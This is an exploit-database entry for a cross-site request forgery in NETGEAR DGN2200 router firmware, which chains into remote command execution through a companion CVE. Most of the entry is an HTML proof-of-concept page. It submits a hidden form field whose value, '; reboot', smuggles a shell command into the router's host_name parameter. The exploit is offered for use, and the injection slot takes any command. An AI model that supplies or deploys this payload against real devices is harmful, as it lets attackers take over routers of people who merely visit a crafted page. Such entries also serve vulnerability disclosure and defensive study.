NETGEAR DGN2200 v1/v2/v3/v4 - Cross-Site Request Forgery Vulnerability

ID 1337DAY-ID-27149
Type zdt
Reporter SivertPL
Modified 2017-02-28T00:00:00


Exploit for hardware platform in category web applications

                                            # Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
# Date: 2017-02-28
# Exploit Author: SivertPL
# Vendor Homepage:
# Software Link:
# Version: (initial) - (latest, still 0-day!)
# Tested on: DGN2200v1,v2,v3,v4
# CVE: CVE-2017-6366
A quite dangerous CSRF was discovered on all DGN2200 firmwares.
When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.
<!DOCTYPE html>
    <title>netgear router CSRF</title>
        <form method="POST" action="">
            <input type="hidden" name="host_name" value="; reboot"> <!-- CVE-2017-6334 payload -->
            <input type="hidden" name="lookup" value="Lookup">
            <button name="clc" value="clc">Would You Dare To?</button> 
<!-- 2017-02-27 by SivertPL -->

# [2018-01-08]  #